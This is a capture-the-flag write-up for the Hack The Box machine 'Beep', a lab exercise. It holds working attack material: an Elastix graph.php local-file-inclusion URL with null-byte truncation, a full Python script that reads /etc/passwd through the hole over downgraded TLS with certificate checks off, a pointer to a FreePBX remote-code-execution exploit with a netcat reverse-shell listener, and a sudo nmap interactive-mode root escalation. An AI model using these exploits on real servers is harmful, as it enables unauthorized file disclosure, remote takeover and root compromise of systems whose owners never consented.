Beep (Hack The Box Writeup)


URL : https://app.hackthebox.eu/machines/Beep

IP : 10.129.1.226

Recon

  • Port 80 serves a login page
    • Elastix

Find Payload

LFI

  • Elastix 2.2.0 – ‘graph.php’ Local File Inclusion
    • https://www.exploit-db.com/exploits/37637
  • Try the LFI
    • https://10.129.1.226/vtigercrm/graph.php?current_language=../../../../../../../etc/passwd%00&module=Accounts&action
    • The %00 null byte truncates the suffix graph.php appends, so the include resolves to /etc/passwd (this only works on the old PHP on this box; PHP 5.3.4 and later reject null bytes in include paths)
  • A Python requests script throws an SSL exception, because the server only speaks an old SSL/TLS version that modern OpenSSL refuses by default
    • https://stackoverflow.com/questions/32330919/python-ssl-ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl
    • Quick fix: lower the system-wide minimum TLS version in the OpenSSL config (this affects every program on the attack box, so revert it afterwards)
      • sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf
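Fetching the LFI without touching the system OpenSSL config, as an added example that is not part of the original writeup. It puts the TLS downgrade in a per-process ssl.SSLContext instead of editing /etc/ssl/openssl.cnf, builds the graph.php URL from the exploit-db 37637 path above, and parses the returned /etc/passwd for accounts with a login shell. TARGET is the lab IP from this writeup; extract_users and the sample passwd lines in the test are constructed additions, not output from the box.

```python
#!/usr/bin/env python3
"""Added example: pull /etc/passwd through the Elastix graph.php LFI over
legacy TLS, scoping the protocol downgrade to this process instead of
lowering MinProtocol in /etc/ssl/openssl.cnf for every program on the box.
Host, path and parameters follow the exploit-db 37637 URL in the writeup."""
import ssl
import urllib.request

TARGET = "10.129.1.226"  # lab IP from the writeup


def build_lfi_url(host, target_file="/etc/passwd", depth=7):
    """Build the graph.php LFI URL.

    current_language is included by graph.php without sanitising; the
    traversal climbs `depth` directories and the trailing %00 truncates
    whatever suffix graph.php appends (null-byte truncation works on the
    old PHP here; PHP 5.3.4+ rejects NULs in include paths).
    """
    traversal = "../" * depth + target_file.lstrip("/")
    return (f"https://{host}/vtigercrm/graph.php"
            f"?current_language={traversal}%00&module=Accounts&action")


def legacy_tls_context():
    """SSL context that will negotiate the box's TLS 1.0 stack.

    Same effect as the MinProtocol downgrade in openssl.cnf, but it only
    applies to this script. Hostname/certificate checks are off because
    the lab box presents a self-signed certificate.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    ctx.set_ciphers("DEFAULT:@SECLEVEL=0")  # OpenSSL >= 1.1 refuses TLS 1.0 at the default level
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def fetch_file(host, target_file="/etc/passwd", timeout=10):
    """Request target_file via the LFI and return the response body as text."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPSHandler(context=legacy_tls_context()))
    with opener.open(build_lfi_url(host, target_file), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_users(passwd_text):
    """Return login names whose shell is not a nologin/false shell.

    graph.php may wrap the included file in HTML, so only well-formed
    7-field passwd lines are considered.
    """
    users = []
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 7 and fields[6] not in ("/sbin/nologin", "/bin/false", ""):
            users.append(fields[0])
    return users


if __name__ == "__main__":
    body = fetch_file(TARGET)
    print(body)
    print("accounts with a login shell:", extract_users(body))
```

The user list is what you feed into the next step (SSH or web logins) instead of reading the raw passwd dump by eye; swap target_file for other readable files once the traversal depth is confirmed.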

RCE

  • Find RCE code (FreePBX 2.10.0 / Elastix 2.2.0 remote code execution)
    • https://github.com/infosecjunky/FreePBX-2.10.0—Elastix-2.2.0—Remote-Code-Execution/blob/master/exploit.py
  • Start an nc listener on the callback port to catch the reverse shell before running the exploit

Privilege Escalation

  • sudo -l shows nmap can be run with sudo
  • sudo nmap --interactive, then !sh at the nmap> prompt spawns a root shell (interactive mode only exists in the older nmap releases, like the one on this box)